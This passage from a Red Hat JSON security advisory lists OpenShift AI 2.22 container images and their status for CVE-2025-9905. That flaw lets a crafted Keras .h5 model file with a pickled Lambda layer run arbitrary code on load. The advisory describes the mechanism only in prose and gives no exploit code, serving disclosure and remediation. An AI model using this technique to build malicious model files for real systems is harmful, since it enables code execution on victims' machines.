"product_reference": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le"
},
"product_reference": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x"
},
"product_reference": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64"
},
"product_reference": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-9905",
"cwe": {
"id": "CWE-913",
"name": "Improper Control of Dynamically-Managed Code Resources"
},
"discovery_date": "2025-09-19T09:00:54.801987+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2396645"
}
],
"notes": [
{
"category": "description",
"text": "A code injection flaw has been discovered in the Keras python module. One can create a specially crafted .h5/.hdf5\u00a0model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed. This is achieved by crafting a special .h5\u00a0archive file that uses the Lambda\u00a0layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True\u00a0option is not honored when reading .h5\u00a0archives.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "keras: Arbitary Code execution in Keras load_model()",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-9905"
},
{
"category": "external",
"summary": "RHBZ#2396645",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2396645"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-9905",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9905"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-9905",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9905"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/pull/21602",
"url": "https://github.com/keras-team/keras/pull/21602"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv"
}
],
"release_date": "2025-09-19T08:16:44.772000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
